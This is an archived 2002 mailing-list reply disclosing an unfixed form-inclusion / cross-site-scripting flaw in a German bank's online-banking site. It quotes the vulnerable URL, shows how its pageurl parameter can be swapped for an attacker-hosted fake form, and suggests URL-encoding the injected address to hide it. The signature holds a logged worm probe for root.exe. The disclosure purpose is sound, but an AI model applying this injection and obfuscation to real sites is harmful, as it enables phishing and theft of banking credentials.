At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote:
>hello

good evening hnz

>I found this security issue on the german hypovereins bank.

I'm from Germany and there was a gap like this in the hypovereinsbank site
a few months ago.

>They are informed vor 3 months ago , still there is nothing changed.
>The security hole will allow a atacker to include his own forms in the
>website. This will give him an option to collect sensible information.
>It is a home bankin system!

I think you can call this security hole CSS (cross-site-scripting). At this
moment I would like to appeal to the paper of Obscure.

http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htm

The german version is under
http://www.code-foundation.de/archiv/form_attack.htm

>take a look at this (long) URL:
>http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
>
>now it is possible to change the
>pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
>part to something like pageurl=http://www.evol.org/fake_form.php
>
>ore try :
>http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de
>
>so it is possible to include everything in this webpage.
>The attacker could obscure the url in a form like:
>pageurl=h%74t%70%3A%2Fw%77w%77............
>so the user will not notice that the include form is not from the original
>server

Yes, you are right. This is a really bad security hole an in my opinion it
is negligent to let shit hole open. The Hypovereinsbank is a great bank in
Germany.

>It opens a port to a new form of social hacking and data grabbing.

ACK. I'm very astonished about the negligence of several System Admins.

>greetings hnz g

Sincerely

Dominik Birk

--
http://www.code-foundation.de
217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET
/MSADC/root.exe?/c+dir
Microsoft? Where do you want to surf today?

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]